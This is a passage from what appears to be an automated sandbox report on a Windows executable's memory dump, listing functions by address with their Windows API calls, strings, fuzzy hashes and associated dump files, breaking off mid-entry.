Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 08d0fa154906e78e11c7cdd88a292290382ab1ea045d6f2a85e89dd9d0a19fc9
Instruction ID: 9a8c14026737f7c5b1bcb1960b52c4ecf34f5142b7380c944af9d098c9f1ee83
Opcode Fuzzy Hash: 08d0fa154906e78e11c7cdd88a292290382ab1ea045d6f2a85e89dd9d0a19fc9
Instruction Fuzzy Hash: 275132749082559FDB10DF68C444AFA3BA0EF96310F148097F8569B3D1D33CAC96CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0044503C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0049DC40,?,0000000F,0000000C,00000016,0049DC40,?), ref: 0044507B

Part of subcall function 004084A6: __swprintf.LIBCMT ref: 004084E5
Part of subcall function 004084A6: __itow.LIBCMT ref: 00408519

Part of subcall function 0040B8A7: _memmove.LIBCMT ref: 0040B8FB

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004450FB

Strings

REMOVE, xrefs: 004450AC
THIS, xrefs: 00445139

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper$__itow__swprintf_memmove
String ID: REMOVE$THIS
API String ID: 2528338962-776492005
Opcode ID: 3e0017ff66cb35053c86b11146194269cb30cad199cdeeb5021e827479a27b8b
Instruction ID: e16f0f45591f96a0c3a590bfe879d51d6c83f2343c3c6f2af04da42c4d308af4
Opcode Fuzzy Hash: 3e0017ff66cb35053c86b11146194269cb30cad199cdeeb5021e827479a27b8b
Instruction Fuzzy Hash: 51419335E00A099FDF00EF55C881BAEB7B5FF48308F04846AE856AB392D7389D46CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6E3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041E6D9,?,0041E55B,0049DC28,?,?), ref: 0041E6F1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0041E703

Strings

IsWow64Process, xrefs: 0041E6FD
kernel32.dll, xrefs: 0041E6EC

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 4fc79e57fc65f5076d5393606c72eeb6317e87e17069bec1d034b8f5c0481679
Instruction ID: 39bcba604db8da3b53060f036efb3d635fba793802818795bd1569c4b2c32648
Opcode Fuzzy Hash: 4fc79e57fc65f5076d5393606c72eeb6317e87e17069bec1d034b8f5c0481679
Instruction Fuzzy Hash: BFD0A7388003129FE7242F62E84C7873BD4BF05700B10492FE8A5D22D4D7B8C4C0C728

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6A6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041E69C,75144970,0041E5AC,0049DC28,?,?), ref: 0041E6B4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0041E6C6

Strings

kernel32.dll, xrefs: 0041E6AF
GetNativeSystemInfo, xrefs: 0041E6C0

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 88bd6c60bb8ec3c280c70ca64e8d7050012d531589bc706bec55a6569a23a907
Instruction ID: ca340492edbbcf33c005f93d35ebf83b6c8d121f87c9c22cc9204298e11b292d
Opcode Fuzzy Hash: 88bd6c60bb8ec3c280c70ca64e8d7050012d531589bc706bec55a6569a23a907
Instruction Fuzzy Hash: BDD05E388003129AD7225B23A80868637D4AF24701B90582FE845922A8D6B8C4C0872C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F32, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00403FAD,00403F28,?,00403F78,?,00403FAD,?,?,?,?,004034E2,?,00000001), ref: 00403F40
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00403F52

Strings

Wow64DisableWow64FsRedirection, xrefs: 00403F4C
kernel32.dll, xrefs: 00403F3B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a62c57b3191e928e97d2e26d34a172fed40150d8782c43b04e06e7fd8f6e95e8
Instruction ID: 622c6a432b609513e866d7c45cc184a7af649587a6ffb6a94834c36d62614bd2
Opcode Fuzzy Hash: a62c57b3191e928e97d2e26d34a172fed40150d8782c43b04e06e7fd8f6e95e8
Instruction Fuzzy Hash: 02D05E748043129AD7202F21A8186467BE8AF04706B10483FE649A1294D7B8C984872C

Uniqueness

Uniqueness Score: -1.00%

Function 0043A8C8, Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beaba4f7d0b5cff3e1cfc5d4f21c5f0d0b67960b5e673aa0bb40276d99075e69
Instruction ID: a29defcead1fea9331de9e6a5cc35466e4146a85edd8bb2b9b9ddb351785f036
Opcode Fuzzy Hash: beaba4f7d0b5cff3e1cfc5d4f21c5f0d0b67960b5e673aa0bb40276d99075e69
Instruction Fuzzy Hash: 7AC1B075A40216EFCB04DF94C884EAEB7B5FF48304F10459AE941EB251D738EE51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA70, Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00456AA6), ref: 0040AB2D
_wcscmp.LIBCMT ref: 0040AB49

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper_wcscmp
String ID:
API String ID: 820872866-0
Opcode ID: bf1bac4cc8506bc6449ed326de2aa526cd37736f34b855b4929ed9e2b4198e0a
Instruction ID: c552ce47eb154b895603420803977c7a73dddad7a78ea2d5de51b13d78e264f0
Opcode Fuzzy Hash: bf1bac4cc8506bc6449ed326de2aa526cd37736f34b855b4929ed9e2b4198e0a
Instruction Fuzzy Hash: 58A1D2707002069BDB14EF65E9816AAB7B1FF44300F65417BED56A72D0DB38A871C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00439F7C, Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00439F8D
SysAllocString.OLEAUT32(?), ref: 0043A036
VariantCopy.OLEAUT32 ref: 0043A065
VariantClear.OLEAUT32(?), ref: 0043A08C

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 049db6d5366744fd11f4cd3645c41be4ab47b0eb8d0459e2bc0571a3a18bbb7c
Instruction ID: eb731e8d020cc8112a13bc8c58bbcc1c18590b43a3404e9bbcc381781222f17f
Opcode Fuzzy Hash: 049db6d5366744fd11f4cd3645c41be4ab47b0eb8d0459e2bc0571a3a18bbb7c
Instruction Fuzzy Hash: CA51AA306803019ADB249F66D49566EF3E5AF4C314F20A81FE5C6D72D1DA789C61871F

Uniqueness

Uniqueness Score: -1.00%

Function 004242EB, Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00424347
_memcpy_s.LIBCMT ref: 004243B9
__filbuf.LIBCMT ref: 0042443A
_memset.LIBCMT ref: 0042447E

Part of subcall function 0042889E: __getptd_noexit.LIBCMT ref: 0042889E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction ID: 45e46fe686809fcf393698bb72f39d66c1f5a047bf83ce3327a8bacb73efcdcf
Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction Fuzzy Hash: 5B51E630B002259BCB24DFA9A88066F77B1EF80324FA4872FFC25963D0D7789D518B48

Uniqueness

Uniqueness Score: -1.00%

Function 0046D5EE, Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046D617
GetWindowRect.USER32(?,?), ref: 0046D68D
PtInRect.USER32(?,?,0046EB2C), ref: 0046D69D
MessageBeep.USER32(00000000), ref: 0046D70E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: cd697977e273f4dc8d8f432d2783e851823ba091818a36681005b93959d8cf90
Instruction ID: 9ef2822fe46286c0229769a4f445f34d61d16ba7c4ddedf3465374105d35f94c
Opcode Fuzzy Hash: cd697977e273f4dc8d8f432d2783e851823ba091818a36681005b93959d8cf90
Instruction Fuzzy Hash: 1E415B30F04118DFCB11DF99D884EA97BF5BF49315F1841ABE4099B2A1E734E841CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00434DB4, Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00434DE8
__isleadbyte_l.LIBCMT ref: 00434E16
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434E44
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434E7A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0adf8b09152cec5ef31cbe3ed3e727a53d73f9dce0acba003150e3272f3294da
Instruction ID: 21cfe8c7b65a511d38e8a298e30c2c1861198b84ef120f218a4ea4f893fcd52b
Opcode Fuzzy Hash: 0adf8b09152cec5ef31cbe3ed3e727a53d73f9dce0acba003150e3272f3294da
Instruction Fuzzy Hash: 2131E131600216AFDF219F75C846BEB7BA5FF89310F15542AE821872E0E738F851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401E58, Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401E87

Part of subcall function 004038E4: _memset.LIBCMT ref: 00403965
Part of subcall function 004038E4: _wcscpy.LIBCMT ref: 004039B5
Part of subcall function 004038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004039C6

KillTimer.USER32(?,00000001), ref: 00401EDC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00401EEB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00474526

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 6916c9860ca332ed2bdd219840f08c7ab6906be1eb212647df180936d246a23a
Instruction ID: 981aa47fdfc168b0355509dfda90694d5d010bfd37604f76e5bbbaaa08f4b789
Opcode Fuzzy Hash: 6916c9860ca332ed2bdd219840f08c7ab6906be1eb212647df180936d246a23a
Instruction Fuzzy Hash: A0210D71904384AFE7328724C855FEBBBEC9B41308F04409FE69E67291C3781985C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C619, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041C657
GetStockObject.GDI32(00000011), ref: 0041C66B
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041C675

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: f2c8a2c5be834c8b746d991152d18751810377bdf17f59ac22982accf7d7e721
Instruction ID: 22d0e7358dfad00b882eb8a9c24e5bef7247071218fd2bdda046f5d389bb4ee5
Opcode Fuzzy Hash: f2c8a2c5be834c8b746d991152d18751810377bdf17f59ac22982accf7d7e721
Instruction Fuzzy Hash: 6311A172541648BFDF115FA09C84EEA7B69EF09354F054116FA0452160D739DCA0DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004280E2, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 0042869E

__lock.LIBCMT ref: 0042811F
InterlockedDecrement.KERNEL32(?), ref: 0042813C
_free.LIBCMT ref: 0042814F
InterlockedIncrement.KERNEL32(00B63720), ref: 00428167

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: f3ec961ce16c52deb0bed978272770712b1791e2121538579d8b5cda04cdb35e
Instruction ID: b2e074bb8376458b5eebb24a5dfb77943c9164c6be0852cff993fd5e10939cb4
Opcode Fuzzy Hash: f3ec961ce16c52deb0bed978272770712b1791e2121538579d8b5cda04cdb35e
Instruction Fuzzy Hash: 2C018E31B02631ABCB11AB66B8067AE7360BF04714F84011FE810677D1CB3C6862CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 00428724, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00428768

Part of subcall function 00428984: __mtinitlocknum.LIBCMT ref: 00428996
Part of subcall function 00428984: RtlEnterCriticalSection.NTDLL(00420127), ref: 004289AF

InterlockedIncrement.KERNEL32(DC840F00), ref: 00428775
__lock.LIBCMT ref: 00428789
___addlocaleref.LIBCMT ref: 004287A7

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 7f6a5cd72f94d5b5e325e9f68b79e11ef24960206569014c4f6d2e3f2a931e6d
Instruction ID: 17a917da67a3bf4d4746f7540ff55d1be89ac1e77758623abe3333d7453ffb6a
Opcode Fuzzy Hash: 7f6a5cd72f94d5b5e325e9f68b79e11ef24960206569014c4f6d2e3f2a931e6d
Instruction Fuzzy Hash: B5016D71602B10DFD720EF66E80575EB7E0AF50329F60890FE499872A1CB78A640CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0046E83C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0041B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041B5EB
Part of subcall function 0041B58B: SelectObject.GDI32(?,00000000), ref: 0041B5FA
Part of subcall function 0041B58B: BeginPath.GDI32(?), ref: 0041B611
Part of subcall function 0041B58B: SelectObject.GDI32(?,00000000), ref: 0041B63B

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046E860
LineTo.GDI32(00000000,?,?), ref: 0046E86D
EndPath.GDI32(00000000), ref: 0046E87D
StrokePath.GDI32(00000000), ref: 0046E88B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c85721842fc19690f6520d3490e6fbc5b03e85c3ded18c4115a6f49fb76691e4
Instruction ID: ec8b68fa9b717d6233d77d2f5b5e4511f36122ee85a1ad509993d382be0632fd
Opcode Fuzzy Hash: c85721842fc19690f6520d3490e6fbc5b03e85c3ded18c4115a6f49fb76691e4
Instruction Fuzzy Hash: A7F0BE31406259BADB122F55AC0DFCE3F9AAF06314F008125FA01660E183794552CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401B72, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00401B83
GlobalMemoryStatusEx.KERNEL32 ref: 00401B9C

Strings

@, xrefs: 00401B91

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: b42ef9dfd8acd37cd93fd03bcb9af2fb8c3f756bc626c33b14844261a1a65558
Instruction ID: ea679fa42b2494ca1182427fbbac61b5c9e409304ab503a84dbd42006d43e58d
Opcode Fuzzy Hash: b42ef9dfd8acd37cd93fd03bcb9af2fb8c3f756bc626c33b14844261a1a65558
Instruction Fuzzy Hash: 9A517B71408744ABE320AF20D885BABBBECFF95354F41485DF5C8810A1EFB585ACC75A

Uniqueness

Uniqueness Score: -1.00%

Function 0044CE59, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 0040417D: __fread_nolock.LIBCMT ref: 0040419B

_wcscmp.LIBCMT ref: 0044CF49
_wcscmp.LIBCMT ref: 0044CF5C

Strings

FILE, xrefs: 0044CE91

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 56222fed6a679f908b8fb074760f5849ac625ed48ee5411df449ea5956ba75a9
Instruction ID: ec6675fbc3358c022d6266dad981fc63a1059a5e2303b6e128b6c35e5e121088
Opcode Fuzzy Hash: 56222fed6a679f908b8fb074760f5849ac625ed48ee5411df449ea5956ba75a9
Instruction Fuzzy Hash: 8241E572600219BAEF109BA5DC85FEF7BB99F89714F00046EF601BB1C1D7799A448B68

Uniqueness

Uniqueness Score: -1.00%

Function 00429AF3, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 0042889E: __getptd_noexit.LIBCMT ref: 0042889E

__getbuf.LIBCMT ref: 00429B8A
__lseeki64.LIBCMT ref: 00429BFA

Strings

pMC, xrefs: 00429AF7, 00429C29, 00429AFB, 00429B89, 00429BB3

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
